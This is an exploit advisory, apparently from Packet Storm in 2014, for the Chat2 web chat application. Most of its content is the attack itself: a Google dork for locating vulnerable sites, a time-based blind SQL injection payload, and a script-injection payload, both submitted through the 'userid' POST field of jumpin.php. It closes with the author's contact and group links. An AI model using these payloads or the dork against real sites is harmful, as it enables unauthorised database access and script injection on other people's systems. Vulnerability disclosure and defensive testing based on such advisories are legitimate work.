Lucene search
Hossein HezamiPACKETSTORM:125780HistoryMar 19, 2014 - 12:00 a.m.
Chat2 Cross Site Scripting / SQL Injection
2014-03-1900:00:00
Hossein Hezami
packetstormsecurity.com
17
`#######################################################################
#
# Exploit Title:
# Chat2 Blind SQL Injection
# Chat2 Cross site scripting
# Date: 2014 18 March
# Author: Dr.3v1l
# Tested on: Windows
# Category: webapps
# Google Dork: inurl:"/chatrooms.php"
#
#######################################################################
#
# [+] Exploit (SQL):
#
# http://<server>/Chat2/jumpin.php
#
# URL encoded POST input userid was set to :
# (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
#
#######################################################################
#
# [+] Exploit (XSS):
#
# http://<server>/Chat2/jumpin.php
#
# URL encoded POST input userid was set to :
# "><script>alert(/xss/)</script>
#
#######################################################################
#
# [+] Contact Me :
#
# [email protected]
# Twitter.com/Doctor_3v1l
# Facebook.com/bdb.0web
# Facebook.com/groups/1427166220843499/
# IR.linkedin.com/in/hossein3v1l
# Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam
#######################################################################
`